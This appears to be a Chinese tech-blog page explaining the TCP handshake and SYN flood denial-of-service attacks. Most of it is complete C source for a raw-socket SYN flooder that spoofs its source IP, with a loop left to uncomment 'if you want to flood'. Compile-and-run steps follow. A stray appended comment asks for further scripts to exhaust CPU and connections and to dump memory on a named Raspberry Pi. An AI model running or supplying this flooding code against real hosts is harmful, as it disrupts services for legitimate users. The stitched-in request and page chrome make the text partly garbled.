SYN Flood DOS Attack with C Source Code

本文详细介绍了TCP/IP三次握手过程及SYN洪水攻击的工作原理。通过发送大量伪造源IP地址的SYN请求包,使服务器资源被占用,导致合法用户访问受限。文中还提供了一个简单的SYN洪水攻击代码示例,并提及了现代防火墙对此类攻击的防护措施。

TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :

1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server

The above 3 steps are followed to establish a connection between source and destination.

SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.

Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.

For more information on TCP Syn DOS attack read up rfc 4987 , titled “TCP SYN Flooding Attacks and Common Mitigations”
over here

Below is an example code in c :

Code

1/*
2     Syn Flood DOS with LINUX sockets
3*/
4#include<stdio.h>
5#include<string.h> //memset
6#include<sys/socket.h>
7#include<stdlib.h> //for exit(0);
8#include<errno.h> //For errno - the error number
9#include<netinet/tcp.h>   //Provides declarations for tcp header
10#include<netinet/ip.h>    //Provides declarations for ip header
11 
12 struct pseudo_header    //needed for checksum calculation
13{
14     unsigned int source_address;
15     unsigned int dest_address;
16     unsigned char placeholder;
17     unsigned char protocol;
18     unsigned short tcp_length;
19      
20     struct tcphdr tcp;
21};
22 
23 unsigned short csum(unsigned short *ptr,int nbytes) {
24     register long sum;
25     unsigned short oddbyte;
26     register short answer;
27 
28     sum=0;
29     while(nbytes>1) {
30         sum+=*ptr++;
31         nbytes-=2;
32     }
33     if(nbytes==1) {
34         oddbyte=0;
35         *((u_char*)&oddbyte)=*(u_char*)ptr;
36         sum+=oddbyte;
37     }
38 
39     sum = (sum>>16)+(sum & 0xffff);
40     sum = sum + (sum>>16);
41     answer=(short)~sum;
42      
43     return(answer);
44}
45 
46 int main (void)
47{
48     //Create a raw socket
49     int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
50     //Datagram to represent the packet
51     char datagram[4096] , source_ip[32];
52     //IP header
53     struct iphdr *iph = (struct iphdr *) datagram;
54     //TCP header
55     struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
56     struct sockaddr_in sin;
57     struct pseudo_header psh;
58      
59     strcpy(source_ip , "192.168.1.2");
60    
61     sin.sin_family = AF_INET;
62     sin.sin_port = htons(80);
63     sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
64      
65     memset (datagram, 0, 4096); /* zero out the buffer */
66      
67     //Fill in the IP Header
68     iph->ihl = 5;
69     iph->version = 4;
70     iph->tos = 0;
71     iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
72     iph->id = htonl (54321); //Id of this packet
73     iph->frag_off = 0;
74     iph->ttl = 255;
75     iph->protocol = IPPROTO_TCP;
76     iph->check = 0;      //Set to 0 before calculating checksum
77     iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
78     iph->daddr = sin.sin_addr.s_addr;
79      
80     iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
81      
82     //TCP Header
83     tcph->source = htons (1234);
84     tcph->dest = htons (80);
85     tcph->seq = 0;
86     tcph->ack_seq = 0;
87     tcph->doff = 5;      /* first and only tcp segment */
88     tcph->fin=0;
89     tcph->syn=1;
90     tcph->rst=0;
91     tcph->psh=0;
92     tcph->ack=0;
93     tcph->urg=0;
94     tcph->window = htons (5840); /* maximum allowed window size */
95     tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
96                 should fill in the correct checksum during transmission */
97     tcph->urg_ptr = 0;
98     //Now the IP checksum
99      
100     psh.source_address = inet_addr( source_ip );
101     psh.dest_address = sin.sin_addr.s_addr;
102     psh.placeholder = 0;
103     psh.protocol = IPPROTO_TCP;
104     psh.tcp_length = htons(20);
105      
106     memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
107      
108     tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
109      
110     //IP_HDRINCL to tell the kernel that headers are included in the packet
111     int one = 1;
112     const int *val = &one;
113     if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
114     {
115         printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" errnostrerror(errno));
116         exit(0);
117     }
118      
119     //Uncommend the loop if you want to flood :)
120     //while (1)
121     //{
122         //Send the packet
123         if (sendto (s,      /* our socket */
124                     datagram,   /* the buffer containing headers and data */
125                     iph->tot_len,    /* total length of our datagram */
126                     0,      /* routing flags, normally always 0 */
127                     (struct sockaddr *) &sin,   /* socket addr, just like in */
128                     sizeof (sin)) < 0)       /* a normal send() */
129         {
130             printf ("error\n");
131         }
132         //Data send successfully
133         else
134         {
135             printf ("Packet Send \n");
136         }
137     //}
138      
139     return 0;
140}

Compile and Run

On Ubuntu

1$ gcc synflood.c
2 sudo ./a.out
3Packet Send

Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.

Back to the attack, can you just come up with different attack scripts to perform: -increase cpu use rate -increase 半开连接数 -increase TCP连接数 -dumping of ram/rom i want it to be all different scripts, the raspberry pi ip is now:192.168.1.101 pi@raspberrypi:~/Desktop $ ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether e4:5f:01:90:77:59 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 5194 bytes 5154687 (4.9 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 5194 bytes 5154687 (4.9 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ppp0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1354 inet 10.2.202.1 netmask 255.255.255.255 destination 169.254.2.1 ppp txqueuelen 3 (Point-to-Point Protocol) RX packets 140 bytes 5668 (5.5 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 141 bytes 3072 (3.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.101 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::aaca:4f53:f21a:68a0 prefixlen 64 scopeid 0x20 ether e4:5f:01:90:77:5b txqueuelen 1000 (Ethernet) RX packets 208576 bytes 299666466 (285.7 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 61106 bytes 10972412 (10.4 MiB) TX errors 0 dropped 20 overruns 0 carrier 0 collisions 0
最新发布
08-01
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值